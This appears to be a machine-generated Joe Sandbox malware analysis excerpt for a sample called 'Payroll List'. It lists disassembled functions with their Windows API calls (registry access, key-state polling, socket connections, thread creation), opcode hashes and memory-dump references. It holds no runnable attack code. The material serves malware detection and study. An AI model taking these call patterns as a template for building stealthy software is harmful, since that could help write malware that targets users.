                                                                    Similarity
                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                    • String ID:
                                                                    • API String ID: 327935632-0
                                                                    • Opcode ID: a265a3ea02f20df27444cb24b95aa935d92dc6bf6f4664af85964f8e52e33a0d
                                                                    • Instruction ID: 056833d00718ae2a14f46967f1b08fa9d80a577d0222d8fd7188fac06f2cafdf
                                                                    • Opcode Fuzzy Hash: a265a3ea02f20df27444cb24b95aa935d92dc6bf6f4664af85964f8e52e33a0d
                                                                    • Instruction Fuzzy Hash: 1E514775A00219DFCB01EFA8D8819ADB7B5BF6D310F058059EA56AB352DB30EE45CF90
                                                                    Function 00182E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00183C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00182BB5,?,?), ref: 00183C1D
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00182EEF
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00182F2E
                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00182F75
                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 00182FA1
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00182FAE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                    • String ID:
                                                                    • API String ID: 3740051246-0
                                                                    • Opcode ID: 17ae7d16dac382a7c1a9a1a57a0a7fa50926e2bccf778c395915bac9e9d1f7c3
                                                                    • Instruction ID: 722b447192e10d2a10d09330a03539854b222077c04e90a11e791a9afa279ea3
                                                                    • Opcode Fuzzy Hash: 17ae7d16dac382a7c1a9a1a57a0a7fa50926e2bccf778c395915bac9e9d1f7c3
                                                                    • Instruction Fuzzy Hash: 2E514871208204AFD705EF64D891E6EB7F9BF98304F04885DF696972A1DB30EA14CF92
                                                                    Function 0018CCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e7eb7f93227dd79ba69559f32bb7fe0c8961869a494048eb8fc444daecfb52a6
                                                                    • Instruction ID: 03de2e2d33104cf89c5faac509440c95fb1e8b99249b57bbbb9e477f51b26343
                                                                    • Opcode Fuzzy Hash: e7eb7f93227dd79ba69559f32bb7fe0c8961869a494048eb8fc444daecfb52a6
                                                                    • Instruction Fuzzy Hash: 8441B079900604ABC724FBA8CC48FA9BF69EB09310F150265F95AA76D1C770AE41DFE0
                                                                    Function 00171206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 001712B4
                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 001712DD
                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0017131C
                                                                      • Part of subcall function 0012936C: __swprintf.LIBCMT ref: 001293AB
                                                                      • Part of subcall function 0012936C: __itow.LIBCMT ref: 001293DF
                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00171341
                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00171349
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                    • String ID:
                                                                    • API String ID: 1389676194-0
                                                                    • Opcode ID: 4ee1010704d00c67a5da62fcedc51c7e88917195c6bb7609cbbefa8b7716fcad
                                                                    • Instruction ID: c12d1c7dfadbdd0486cde2743aa536635c82be239a58ccd744fa1d2de288c939
                                                                    • Opcode Fuzzy Hash: 4ee1010704d00c67a5da62fcedc51c7e88917195c6bb7609cbbefa8b7716fcad
                                                                    • Instruction Fuzzy Hash: D6411C35A00515DFCF01EF64D981AADBBF5FF19310B148099E90AAB362CB31ED51DB90
                                                                    Function 0013B63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCursorPos.USER32(000000FF), ref: 0013B64F
                                                                    • ScreenToClient.USER32(00000000,000000FF), ref: 0013B66C
                                                                    • GetAsyncKeyState.USER32(00000001), ref: 0013B691
                                                                    • GetAsyncKeyState.USER32(00000002), ref: 0013B69F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                    • String ID:
                                                                    • API String ID: 4210589936-0
                                                                    • Opcode ID: 907cf7d73f3c8ae9635ed0b8c356ab5d64513b480258f026e1fea5764f38fbbf
                                                                    • Instruction ID: e649d9d86420e23f6ee69d59705c7449f87e0e7a251dabaeb681bfeaad1a73cf
                                                                    • Opcode Fuzzy Hash: 907cf7d73f3c8ae9635ed0b8c356ab5d64513b480258f026e1fea5764f38fbbf
                                                                    • Instruction Fuzzy Hash: 81417E75A08119FBCF199F64C885AEDBBB4FB05324F104319F82A96291DB30AD94DFA1
                                                                    Function 0015B358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindowRect.USER32(?,?), ref: 0015B369
                                                                    • PostMessageW.USER32(?,00000201,00000001), ref: 0015B413
                                                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0015B41B
                                                                    • PostMessageW.USER32(?,00000202,00000000), ref: 0015B429
                                                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0015B431
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePostSleep$RectWindow
                                                                    • String ID:
                                                                    • API String ID: 3382505437-0
                                                                    • Opcode ID: 13dd13b811e8ecf55b21fd97cda71c22079f94ce671ee7081f4ac49f90fb39e3
                                                                    • Instruction ID: def66cdb9c90b0b8a4f245a8095fa8f8d4d26d08589defa5b1e327eaf1c399ae
                                                                    • Opcode Fuzzy Hash: 13dd13b811e8ecf55b21fd97cda71c22079f94ce671ee7081f4ac49f90fb39e3
                                                                    • Instruction Fuzzy Hash: AE31CE71904219EBDF14CF68D98DADE3BB5FB05316F114229F836AA1D1C3B09958CB90
                                                                    Function 0015DBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsWindowVisible.USER32(?), ref: 0015DBD7
                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0015DBF4
                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0015DC2C
                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0015DC52
                                                                    • _wcsstr.LIBCMT ref: 0015DC5C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                    • String ID:
                                                                    • API String ID: 3902887630-0
                                                                    • Opcode ID: a54003ac2e464b9cab31a785302ce8bc42cf7940bd390283cdc05f76f5ffb051
                                                                    • Instruction ID: 16c400fe329020b5a62f3a098a43148c1ea4e0f41e122fd2dea22bc9750f28b9
                                                                    • Opcode Fuzzy Hash: a54003ac2e464b9cab31a785302ce8bc42cf7940bd390283cdc05f76f5ffb051
                                                                    • Instruction Fuzzy Hash: A521F272204200FBEB259F29AC49E7B7BA8DF46761F11402DFC0ECE191EBA1C84593A0
                                                                    Function 0015BC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0015BC90
                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0015BCC2
                                                                    • __itow.LIBCMT ref: 0015BCDA
                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0015BD00
                                                                    • __itow.LIBCMT ref: 0015BD11
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$__itow
                                                                    • String ID:
                                                                    • API String ID: 3379773720-0
                                                                    • Opcode ID: 5abebf8cd7fa2cf1bbee98c7afea26a5aba03f250851c1897281c6e1ebf01cf2
                                                                    • Instruction ID: bec04c1d1e9f0c61e84382a0d8ca40bb078bf7d0359a40ed73c099f2310edf96
                                                                    • Opcode Fuzzy Hash: 5abebf8cd7fa2cf1bbee98c7afea26a5aba03f250851c1897281c6e1ebf01cf2
                                                                    • Instruction Fuzzy Hash: A621C635600618FEDB10ABA59CC6FDE7A79AF5A711F000025FD26EF181EBB08D4987A1
                                                                    Function 00166318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 001250E6: _wcsncpy.LIBCMT ref: 001250FA
                                                                    • GetFileAttributesW.KERNEL32(?,?,?,?,001660C3), ref: 00166369
                                                                    • GetLastError.KERNEL32(?,?,?,001660C3), ref: 00166374
                                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,001660C3), ref: 00166388
                                                                    • _wcsrchr.LIBCMT ref: 001663AA
                                                                      • Part of subcall function 00166318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,001660C3), ref: 001663E0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                    • String ID:
                                                                    • API String ID: 3633006590-0
                                                                    • Opcode ID: e77200bba0bff1b03071649ef720a199d9b2a4d5374cb8513bcc510de420c56f
                                                                    • Instruction ID: a687072ba8ba2f3c326b61cb6fd2614646ee360702d92c1e4e89d85e06630bc1
                                                                    • Opcode Fuzzy Hash: e77200bba0bff1b03071649ef720a199d9b2a4d5374cb8513bcc510de420c56f
                                                                    • Instruction Fuzzy Hash: 612105319042159BDB15AB78AC46FEA33ACFF26360F10006AF04ED72D0EB60DD958A55
                                                                    Function 00178B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0017A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0017A84E
                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00178BD3
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00178BE2
                                                                    • connect.WSOCK32(00000000,?,00000010), ref: 00178BFE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastconnectinet_addrsocket
                                                                    • String ID:
                                                                    • API String ID: 3701255441-0
                                                                    • Opcode ID: 43d6f1d1e91db70a3750bb5e9b4fa215a08b98611b184233fba75925ed7d9193
                                                                    • Instruction ID: 1f3043cb290306bd66510e1f3754a7cf27cddd98c5869b8f6508f0534b5d0341
                                                                    • Opcode Fuzzy Hash: 43d6f1d1e91db70a3750bb5e9b4fa215a08b98611b184233fba75925ed7d9193
                                                                    • Instruction Fuzzy Hash: 6E21CD312006149FCB14AF68DC89B7E77A9AF59724F048449F94AAB2D2CF74AC418B61
                                                                    Function 00178420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsWindow.USER32(00000000), ref: 00178441
                                                                    • GetForegroundWindow.USER32 ref: 00178458
                                                                    • GetDC.USER32(00000000), ref: 00178494
                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 001784A0
                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 001784DB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ForegroundPixelRelease
                                                                    • String ID:
                                                                    • API String ID: 4156661090-0
                                                                    • Opcode ID: 47ec9cbe35af5bb95c14c703a00022cc2b88774b6049a5e8581ff17e1db234fc
                                                                    • Instruction ID: 0a75dc68643513481d3f753efb9a71af0b6f8b937f87a2cae6fb269bd203fa57
                                                                    • Opcode Fuzzy Hash: 47ec9cbe35af5bb95c14c703a00022cc2b88774b6049a5e8581ff17e1db234fc
                                                                    • Instruction Fuzzy Hash: 94215E75A00204AFD704EFA4D889AAEBBF5EF49301F148479F85A97A51DB70AC40CB60
                                                                    Function 0013AF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0013AFE3
                                                                    • SelectObject.GDI32(?,00000000), ref: 0013AFF2
                                                                    • BeginPath.GDI32(?), ref: 0013B009
                                                                    • SelectObject.GDI32(?,00000000), ref: 0013B033
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                    • String ID:
                                                                    • API String ID: 3225163088-0
                                                                    • Opcode ID: 3899f449229c9ec7815d290c6b972beff619f22db797c941f01504b989a1dc4d
                                                                    • Instruction ID: 467005b3d6f7e2f2d7643de108703d919b756089b466678c1bfc9ef4665cd2a0
                                                                    • Opcode Fuzzy Hash: 3899f449229c9ec7815d290c6b972beff619f22db797c941f01504b989a1dc4d
                                                                    • Instruction Fuzzy Hash: 9021BDB0900284FFDB14DF94ECC87AE3B78BB18361F54431AF5259A8A0D3B049C18F90
                                                                    Function 0014217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __calloc_crt.LIBCMT ref: 001421A9
                                                                    • CreateThread.KERNEL32(?,?,001422DF,00000000,?,?), ref: 001421ED
                                                                    • GetLastError.KERNEL32 ref: 001421F7
                                                                    • _free.LIBCMT ref: 00142200
                                                                    • __dosmaperr.LIBCMT ref: 0014220B
                                                                      • Part of subcall function 00147C0E: __getptd_noexit.LIBCMT ref: 00147C0E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                    • String ID:
                                                                    • API String ID: 2664167353-0
                                                                    • Opcode ID: 7ea0ea2872f72ea1ce2cbf67808e46a7ed485795c420f914f9e5edd26bc9ab7f
                                                                    • Instruction ID: ecc58386a3380750697769d8369be865875e2dc7375f7bdd8aefa44c240bda92
                                                                    • Opcode Fuzzy Hash: 7ea0ea2872f72ea1ce2cbf67808e46a7ed485795c420f914f9e5edd26bc9ab7f
                                                                    • Instruction Fuzzy Hash: 01114973104746AFDB11BFA4EC41DAB3BA9EF11B70B200429F914C71B1EBB1D88187A1
                                                                    Function 0015ABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0015ABD7
                                                                    • GetLastError.KERNEL32(?,0015A69F,?,?,?), ref: 0015ABE1
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,0015A69F,?,?,?), ref: 0015ABF0
                                                                    • HeapAlloc.KERNEL32(00000000,?,0015A69F,?,?,?), ref: 0015ABF7
                                                                    • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0015AC0E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 842720411-0
                                                                    • Opcode ID: 74aed86ee423ecb59c39f901444645ebae4aefd91237e8c0b3f1a85e206363fa
                                                                    • Instruction ID: d7b3ff3e1430a3072babbf0debc5a6b39ff485b43297b2c08d96c764e53a2837
                                                                    • Opcode Fuzzy Hash: 74aed86ee423ecb59c39f901444645ebae4aefd91237e8c0b3f1a85e206363fa
                                                                    • Instruction Fuzzy Hash: A8013CB1240204BFDB104FA9EC48DAB3BADFF8A7557100529F95AC7660DB71DC84CB61
                                                                    Function 00167A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00167A74
                                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00167A82
                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00167A8A
                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00167A94
                                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00167AD0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                    • String ID:
                                                                    • API String ID: 2833360925-0
                                                                    • Opcode ID: 19b18bd0e6f298ec457be04aac3a55f70206d0661ba460cc4680fce8a79478f5
                                                                    • Instruction ID: 5c238be0d7b1474ff020026e93fa8c0755c4d219ea09b33f6c554f70013eb9a7
                                                                    • Opcode Fuzzy Hash: 19b18bd0e6f298ec457be04aac3a55f70206d0661ba460cc4680fce8a79478f5
                                                                    • Instruction Fuzzy Hash: 81014036C05A19EBCF00AFE4EC48AEDBB78FF09715F050455E502B3690DB3096A0CBA1
                                                                    Function 00159ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CLSIDFromProgID.OLE32 ref: 00159ADC
                                                                    • ProgIDFromCLSID.OLE32(?,00000000), ref: 00159AF7
                                                                    • lstrcmpiW.KERNEL32(?,00000000), ref: 00159B05
                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00159B15
                                                                    • CLSIDFromString.OLE32(?,?), ref: 00159B21
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
